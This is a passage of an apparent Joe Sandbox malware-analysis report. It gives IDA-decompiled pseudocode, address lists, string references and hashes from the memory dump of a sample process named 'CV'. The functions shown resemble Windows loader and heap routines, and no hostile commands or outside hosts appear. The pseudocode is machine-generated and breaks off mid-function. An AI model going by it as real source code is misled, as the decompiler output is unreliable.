					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0130BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0130AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01289730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0130A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0130A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01289730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0130A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0130A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01262280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0125B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0125FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01267D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E012FFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0130e547
0x0130e549
0x0130e54f
0x0130e553
0x0130e557
0x0130e55a
0x0130e55c
0x0130e55f
0x0130e561
0x0130e567
0x0130e56b
0x0130e7e2
0x00000000
0x0130e571
0x0130e575
0x0130e577
0x0130e57b
0x0130e57c
0x0130e57d
0x0130e57e
0x0130e57f
0x0130e588
0x0130e58f
0x0130e591
0x0130e592
0x0130e592
0x0130e596
0x0130e59e
0x0130e5a0
0x0130e5a6
0x0130e61d
0x0130e61d
0x0130e621
0x0130e623
0x0130e630
0x0130e630
0x0130e7e6
0x0130e7eb
0x0130e7ed
0x0130e7f4
0x0130e7fa
0x0130e7ff
0x0130e7ff
0x0130e80a
0x0130e812
0x0130e812
0x0130e5ab
0x0130e5b4
0x0130e5b9
0x0130e5be
0x0130e5c0
0x0130e5c2
0x0130e5c8
0x0130e5c9
0x0130e5cb
0x0130e5cc
0x0130e5d5
0x0130e5e4
0x0130e5f1
0x0130e5f8
0x0130e5f8
0x0130e5d5
0x0130e602
0x0130e616
0x0130e63d
0x0130e644
0x0130e64d
0x0130e652
0x0130e657
0x0130e659
0x0130e65b
0x0130e661
0x0130e662
0x0130e664
0x0130e665
0x0130e66e
0x0130e67d
0x0130e68a
0x0130e691
0x0130e691
0x0130e66e
0x0130e6b0
0x00000000
0x0130e6b6
0x0130e6bd
0x0130e6c7
0x0130e6d7
0x0130e6d9
0x0130e6db
0x0130e6de
0x0130e6e3
0x0130e6f3
0x0130e6fc
0x0130e700
0x0130e700
0x0130e704
0x0130e70a
0x0130e70a
0x0130e713
0x0130e716
0x0130e719
0x0130e720
0x0130e761
0x0130e76b
0x0130e774
0x0130e77a
0x0130e77a
0x0130e78a
0x0130e791
0x0130e799
0x0130e79b
0x0130e79f
0x0130e7aa
0x0130e7c0
0x0130e7ac
0x0130e7b2
0x0130e7b9
0x0130e7b9
0x0130e7c7
0x0130e806
0x00000000
0x0130e7c9
0x0130e7d1
0x0130e7d8
0x00000000
0x0130e7d8
0x00000000
0x00000000
0x0130e722
0x0130e72e
0x0130e748
0x0130e74c
0x0130e754
0x0130e756
0x0130e75c
0x0130e75c
0x00000000
0x0130e75c
0x0130e758
0x0130e758
0x00000000
0x0130e758
0x0130e750
0x00000000
0x00000000
0x0130e752
0x00000000
0x0130e752
0x0130e730
0x0130e735
0x0130e73d
0x0130e73f
0x00000000
0x00000000
0x0130e741
0x0130e741
0x00000000
0x0130e741
0x0130e739
0x00000000
0x00000000
0x0130e73b
0x00000000
0x0130e73b
0x0130e722
0x0130e720
0x0130e6b0
0x0130e618
0x00000000
0x0130e618

Strings

`, xrefs: 0130E5D7
`, xrefs: 0130E670

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 7766fc7ef94d8b43926fa98dda43ea220f2c15d6de02c49043f42e0bdf9c8142
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7F918F713043469BE726CE29C851B2BBBE5AF84B28F148D2DF695CB2C0E774E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012C51BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012C51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13205f0);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012C53CA(0);
						return E0129D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0128F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01263690(1, _t117, 0x1221810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0128AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01264620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0128AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E012C500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01289860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x012c51be
0x012c51c3
0x012c51c8
0x012c51cd
0x012c51d0
0x012c51d3
0x012c51d8
0x012c51db
0x012c51de
0x012c51e0
0x012c51e3
0x012c51e6
0x012c51e8
0x012c5342
0x012c5351
0x012c5356
0x012c535a
0x012c5360
0x012c5363
0x012c5366
0x012c5369
0x012c5369
0x012c536b
0x012c536b
0x012c5370
0x012c53a3
0x012c53a4
0x012c53a6
0x012c53ab
0x012c53ab
0x012c53ae
0x012c53ae
0x012c53b5
0x012c53bf
0x012c53bf
0x012c5375
0x012c5396
0x012c53a0
0x012c53a0
0x00000000
0x012c5396
0x012c5377
0x012c5379
0x012c537f
0x012c538c
0x012c5390
0x00000000
0x012c5390
0x012c51ee
0x012c51f1
0x012c5301
0x012c5310
0x012c5315
0x012c5318
0x012c531b
0x012c5320
0x012c532e
0x012c5331
0x00000000
0x012c5331
0x012c5328
0x012c5329
0x00000000
0x012c5329
0x012c51fa
0x012c5235
0x012c5236
0x012c5239
0x012c523f
0x012c5240
0x012c5241
0x012c5242
0x012c5246
0x012c5247
0x012c524e
0x012c5251
0x012c5267
0x012c5269
0x012c526e
0x012c527d
0x012c527e
0x012c5281
0x012c5282
0x012c5287
0x012c5288
0x012c528a
0x012c528f
0x012c5294
0x00000000
0x00000000
0x012c529a
0x012c529c
0x012c529e
0x012c529e
0x012c52a4
0x012c52b0
0x00000000
0x00000000
0x012c52ba
0x012c52bc
0x012c52bc
0x012c52d4
0x012c52d9
0x012c52dc
0x012c52e1
0x00000000
0x00000000
0x012c52e7
0x012c52f4
0x00000000
0x012c52f4
0x012c5270
0x00000000
0x012c5270
0x012c51fc
0x012c51fd
0x012c5202
0x012c5203
0x012c5205
0x012c520a
0x012c520f
0x00000000
0x00000000
0x012c521b
0x012c5226
0x012c522b
0x012c521d
0x012c521d
0x012c5222
0x012c5222
0x012c522d
0x00000000

Strings

Legacy, xrefs: 012C5226
UEFI, xrefs: 012C521D

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction ID: 5334c765b43bd13299fb7f36f394f5836f1871cc12878e319d3d36557c86e42a
Opcode Fuzzy Hash: 8da84eb58a75630cd9c35ec339af4f131ab81c14d29c8cea7d863fc40c440fce
Instruction Fuzzy Hash: 5E518171A606199FDB15DFA8C880AADBBF9FF44B00F14412DE649EB291DA71E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0125D5E0 Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0125D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x133d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01256600(0x13352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1337b9c; // 0x0
							_t281 = L01264620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0128F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1337b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x1337b8c; // 0xca2a40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01262280(_t200, 0x13384d8);
									_t277 =  *0x13385f4; // 0xca2f30
									_t351 =  *0x13385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xca2ec8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0125FFB0(_t287, _t353, 0x13384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0129CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01256600(0x13352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01257926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x133b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E012CE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1338472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x133b218; // 0x0
														asm("ror edi, cl");
														 *0x133b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01262280(_t250, 0x13384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01283898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0125FFB0(_t293, _t353, 0x13384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E012837F5(_t353, 0);
																}
																E01280413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01279B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E012702D6(_t174);
																}
																L012677F0( *0x1337b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0127C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0125EC7F(_t353);
										L012719B8(_t287, 0, _t353, 0);
										_t200 = E0124F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0128B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x133b2f8; // 0x0
									if((_t206 |  *0x133b2fc) == 0 || ( *0x133b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x133b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E012F6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E012F6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0125E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0125EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01289730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0125E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
